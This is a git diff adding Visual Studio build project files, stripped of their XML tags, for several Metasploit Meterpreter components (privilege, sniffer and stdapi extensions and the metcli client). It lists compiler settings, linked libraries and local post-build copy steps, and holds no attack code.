+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_priv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;psapi.lib;odbc32.lib;odbccp32.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_priv.dll
+ true
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ .\Release/ext_server_priv.pdb
+ false
+
+
+ .\Release/ext_server_priv.lib
+ MachineX86
+ 5.0
+ Windows
+
+
+ true
+ .\Release/ext_server_priv.bsc
+
+
+ copy /y "$(ProjectDir)\release\ext_server_priv.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Release/ext_server_priv.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_priv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ psapi.lib;odbc32.lib;odbccp32.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release\ext_server_priv.x64.dll
+ true
+ ..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ .\Release/ext_server_priv.pdb
+ false
+
+
+ .\Release/ext_server_priv.lib
+ MachineX64
+
+
+
+
+ true
+ .\Release/ext_server_priv.bsc
+
+
+ copy /y "$(ProjectDir)\release\ext_server_priv.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Debug/ext_server_priv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_priv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ psapi.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_priv.dll
+ true
+ true
+ .\Debug/ext_server_priv.pdb
+ false
+
+
+ .\Debug/ext_server_priv.lib
+ MachineX86
+
+
+ true
+ .\Debug/ext_server_priv.bsc
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Debug/ext_server_priv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_priv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ psapi.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_priv.dll
+ true
+ true
+ .\Debug/ext_server_priv.pdb
+ false
+
+
+ .\Debug/ext_server_priv.lib
+ MachineX64
+
+
+ true
+ .\Debug/ext_server_priv.bsc
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {662afbb3-f64a-4ad1-8956-b9f1b846231c}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj b/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
new file mode 100644
index 0000000000..7094f521af
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
@@ -0,0 +1,263 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}
+ ext_server_incognito
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ Neither
+ ..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\source\pssdk\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;_CRT_SECURE_NO_WARNINGS;EXT_SERVER_SNIFFER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ Default
+ false
+ precomp.h
+ .\Release/ext_server_sniffer.pch
+
+
+ backcompat.lib;metsrv.lib;pssdk.lib;ws2_32.lib;%(AdditionalDependencies)
+ .\Release/ext_server_sniffer.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\pssdk\win32;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ false
+
+
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_sniffer.lib
+ MachineX86
+ false
+ 5.0
+ false
+
+
+ copy /y "$(ProjectDir)\release\*.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MinSpace
+ Default
+ false
+ Size
+ ..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\source\pssdk\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+ precomp.h
+ .\Release/ext_server_sniffer.pch
+
+
+ metsrv.lib;pssdk.lib;kernel32.lib;ws2_32.lib;%(AdditionalDependencies)
+ .\Release/ext_server_sniffer.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\pssdk\win64;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_sniffer.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_sniffer.lib
+ MachineX64
+ false
+
+
+ false
+
+
+ copy /y "$(ProjectDir)\release\*.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/external/source/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
new file mode 100644
index 0000000000..28e0d57930
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
@@ -0,0 +1,636 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}
+ ext_server_stdapi
+
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Debug/ext_server_stdapi.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_stdapi.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ iphlpapi.lib;shlwapi.lib;ws2_32.lib;metsrv.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_stdapi.dll
+ true
+ ..\metsrv\Debug;%(AdditionalLibraryDirectories)
+ true
+ .\Debug/ext_server_stdapi.pdb
+ false
+
+
+ .\Debug/ext_server_stdapi.lib
+ MachineX86
+
+
+ true
+ .\Debug/ext_server_stdapi.bsc
+
+
+ copy debug\ext_server_stdapi.dll ..\..\output\extensions
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Debug/ext_server_stdapi.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_stdapi.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ iphlpapi.lib;shlwapi.lib;ws2_32.lib;metsrv.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_stdapi.dll
+ true
+ ..\metsrv\Debug;%(AdditionalLibraryDirectories)
+ true
+ .\Debug/ext_server_stdapi.pdb
+ false
+
+
+ .\Debug/ext_server_stdapi.lib
+ MachineX64
+
+
+ true
+ .\Debug/ext_server_stdapi.bsc
+
+
+ copy debug\ext_server_stdapi.dll ..\..\output\extensions
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Release/ext_server_stdapi.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)
+ false
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_stdapi.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;iphlpapi.lib;shlwapi.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;metsrv.lib;jpeg.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\ext_server_stdapi.dll
+ true
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\jpeg-8\lib\win\x86;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ true
+ .\Release/ext_server_stdapi.map
+ false
+
+
+ .\Release/ext_server_stdapi.lib
+ MachineX86
+ 5.0
+ Windows
+
+
+ true
+ .\Release/ext_server_stdapi.bsc
+
+
+ copy /y "$(ProjectDir)\release\ext_server_stdapi.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Release/ext_server_stdapi.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_stdapi.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ iphlpapi.lib;shlwapi.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;metsrv.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\ext_server_stdapi.x64.dll
+ true
+ ..\..\source\jpeg-8\lib\win\x64;..\metsrv\Release;..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ true
+ .\Release/ext_server_stdapi.map
+ false
+
+
+ .\Release/ext_server_stdapi.lib
+ MachineX64
+
+
+
+
+ true
+ .\Release/ext_server_stdapi.bsc
+
+
+ copy /y "$(ProjectDir)\release\*.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/metcli/metcli.vcxproj b/external/source/meterpreter/workspace/metcli/metcli.vcxproj
new file mode 100644
index 0000000000..a16e30b67a
--- /dev/null
+++ b/external/source/meterpreter/workspace/metcli/metcli.vcxproj
@@ -0,0 +1,349 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {4DECF649-2B11-47A2-908E-031105D706F8}
+ metcli
+
+
+
+ Application
+ false
+ MultiByte
+
+
+ Application
+ false
+ MultiByte
+
+
+ Application
+ false
+ MultiByte
+
+
+ Application
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ .\Debug/metcli.tlb
+
+
+
+
+ Disabled
+ _DEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ metcli.h
+ .\Debug/metcli.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/metcli.exe
+ true
+ ..\common\Debug;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Debug/metcli.pdb
+ Console
+ false
+
+
+ MachineX86
+
+
+ true
+ .\Debug/metcli.bsc
+
+
+ copy debug\metcli.exe ..\..\output\client
+
+
+
+
+ X64
+ .\Debug/metcli.tlb
+
+
+
+
+ Disabled
+ _DEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ metcli.h
+ .\Debug/metcli.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/metcli.exe
+ true
+ ..\common\Debug;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Debug/metcli.pdb
+ Console
+ false
+
+
+ MachineX64
+
+
+ true
+ .\Debug/metcli.bsc
+
+
+ copy debug\metcli.exe ..\..\output\client
+
+
+
+
+ .\Release/metcli.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ true
+ Use
+ metcli.h
+ .\Release/metcli.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Release/metcli.exe
+ true
+ ..\backcompat\Release;..\common\Release; ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Release/metcli.pdb
+ Console
+ false
+
+
+ MachineX86
+
+
+ true
+ .\Release/metcli.bsc
+
+
+ copy /y "$(ProjectDir)\release\metcli.exe" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+ .\Release/metcli.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Use
+ metcli.h
+ .\Release/metcli.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
